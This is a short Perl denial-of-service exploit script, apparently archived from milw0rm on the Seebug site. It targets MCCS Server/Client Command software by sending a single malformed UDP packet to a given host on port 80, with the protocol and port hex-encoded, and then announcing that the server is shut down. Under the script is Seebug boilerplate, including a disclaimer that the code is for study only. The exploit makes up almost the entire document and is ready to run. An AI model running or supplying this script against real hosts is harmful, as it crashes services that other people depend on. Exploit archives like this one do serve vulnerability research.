#!usr/bin/perl # # MCCS Server\Client Command DOS Exploit # -------------------------------------- # Infam0us Gr0up - Securiti Research # # Info: infamous.2hell.com # Vendor URL: www.xclusive-software.com # use IO::Socket; print("\n MCCS Command DOS Exploit\n"); print("-----------------------------\n"); $str = "\x41"; if($#ARGV < 0 | $#ARGV > 1) { die "usage: perl $0 [IP/host] \nExam: perl $0 127.0.0.1 \n" }; $adr = $ARGV[0]; $prt = "\x38\x30"; print "[+] Connect to host..\n"; sleep 2; $remote = IO::Socket::INET->new(Proto=>"\x75\x64\x70", PeerAddr=>$adr, PeerPort=>$prt, Reuse=>1) or die "[-] Error: can't connect to $adr:$prt\n"; print "[+] Connected\n"; $remote->autoflush(1); print "[+] Sending bad string..\n"; sleep 2; print $remote "$str" or die "[-] Error: can't send string code\n"; print "[*] Client Server SHUTDOWNED!\n\n"; print "press any key to exit..\n"; $bla= <STDIN>; close $remote; # milw0rm.com [2005-09-19]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论